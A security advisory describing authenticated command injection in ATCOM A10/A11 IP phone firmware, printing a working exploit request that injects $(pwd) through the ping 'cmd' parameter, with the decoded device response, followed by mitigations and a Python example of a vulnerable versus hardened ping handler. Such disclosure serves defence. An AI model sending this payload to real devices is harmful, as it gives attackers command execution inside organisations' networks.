ATCOM A10/A11: Authenticated Command Injection
- Author: MOHAMMED ADEL
Introduction
An authenticated attacker can execute arbitrary commands on the BusyBox-based operating system of ATCOM A10/A11 IP phones by sending a specially crafted HTTP request to the device's web interface. Where compensating controls are absent (management interface reachable from user networks, default or shared admin credentials), the vulnerability gives anyone holding the web credentials a foothold on the phone from which to establish persistent access inside the affected organization's network.
Exploit
The exploit request is shown below. The injection point is the cmd parameter: the device splices its value into the command line it hands to ping through the shell, so the BusyBox shell expands $(pwd) before ping ever sees its argument. The Digest fields marked value_here are computed per request from the admin password and the server's nonce:
POST /cgi-bin/web_cgi_main.cgi?user_get_phone_ping HTTP/1.1
Host: {TARGET_IP}
User-Agent: polar
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Authorization: Digest username="admin", realm="IP Phone Web Configuration", nonce="value_here", uri="/cgi-bin/web_cgi_main.cgi?user_get_phone_ping", response="value_here", qop=auth, nc=value_here, cnonce="value_here"

cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_ping
The device responds as follows:
{"ping_cmd_result":"cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9saWdodHRwZC93d3cvY2dpLWJpbicK","ping_cmd":"0.0.0.0$(pwd)"}
The value of ping_cmd_result is base64-encoded. Decoding it reveals the output of the injected command: because the shell substituted the result of pwd into the target string, ping's "bad address" error now carries the CGI's working directory:
ping: bad address '0.0.0.0/usr/local/app/lighttpd/www/cgi-bin'
Affected Firmware Versions
Testing determined that ATCOM A10/A11 firmware versions from 2.7.x.x onward are susceptible to this authenticated command injection.
Mitigation / Fix
The mitigation proposed here is to downgrade the ATCOM A10/A11 firmware to 2.6.x.x or older, where the vulnerable ping feature does not exist. Downgrading trades this issue for whatever was fixed after 2.6.x.x, so pair it with the controls that limit the exploit's reach on any version: the request needs valid web-interface credentials, so replace default admin passwords, and restrict access to the phones' web interface to a management network.
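For comparison, an added example of the server-side fix the firmware lacks. This is not ATCOM's code and the device's actual CGI source is not on the page: it shows the injectable pattern the advisory implies (the raw cmd parameter spliced into a shell command line) beside a hardened handler that accepts only an IP literal and runs ping with an argv list, so no shell ever interprets user input. The meaning of ipv4_ipv6 (0 for IPv4, 1 for IPv6), the ping count and the function names are assumptions.

```python
"""Vulnerable pattern beside a hardened ping handler.
Added example, not vendor code; ipv4_ipv6 semantics and names are assumptions."""
import ipaddress
import subprocess

PING_COUNT = "4"   # assumption: how many probes the web UI's ping sends


def unsafe_ping_command(cmd: str, ipv4_ipv6: str) -> str:
    """The injectable pattern: the raw parameter becomes part of a shell string.
    Returned rather than executed so the problem is visible; fed to `sh -c`,
    the shell expands $(...) in cmd before ping sees its argument."""
    prog = "ping6" if ipv4_ipv6 == "1" else "ping"
    return prog + " -c " + PING_COUNT + " " + cmd


def validate_target(cmd: str, ipv4_ipv6: str):
    """Return an ipaddress object or raise ValueError.
    ipaddress.ip_address rejects anything that is not an address literal,
    including the advisory's payload 0.0.0.0$(pwd). Two extra checks:
    the family must match the ipv4_ipv6 selector, and IPv6 zone IDs
    (fe80::1%eth0), which newer Pythons parse and leave unvalidated, are
    refused because the web UI has no use for an interface name."""
    addr = ipaddress.ip_address(cmd.strip())
    want = 6 if ipv4_ipv6 == "1" else 4
    if addr.version != want:
        raise ValueError("address family does not match ipv4_ipv6")
    if getattr(addr, "scope_id", None):
        raise ValueError("zone index not allowed")
    return addr


def is_valid_target(cmd: str, ipv4_ipv6: str) -> bool:
    """Boolean wrapper around validate_target for callers that do not want exceptions."""
    try:
        validate_target(cmd, ipv4_ipv6)
        return True
    except ValueError:
        return False


def safe_ping_argv(cmd: str, ipv4_ipv6: str) -> list:
    """Build an argv list from the validated, canonicalised address.
    No shell is involved, so metacharacters in cmd can never be expanded;
    they are simply rejected earlier as not being an address."""
    addr = validate_target(cmd, ipv4_ipv6)
    prog = "ping6" if addr.version == 6 else "ping"
    return [prog, "-c", PING_COUNT, str(addr)]


def safe_ping(cmd: str, ipv4_ipv6: str, timeout: float = 15.0) -> str:
    """Execute the hardened version. subprocess.run gets a list, not a command
    string, so even a validation bypass could not reach a shell."""
    result = subprocess.run(safe_ping_argv(cmd, ipv4_ipv6),
                            capture_output=True, text=True, timeout=timeout)
    return result.stdout + result.stderr
```

The two defences are independent on purpose: strict parsing rejects the payload, and the argv form means that even an address-shaped string that somehow passed validation would reach ping as a single argument rather than a shell command line.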
Reference
- Exploit-DB: https://www.exploit-db.com/exploits/51742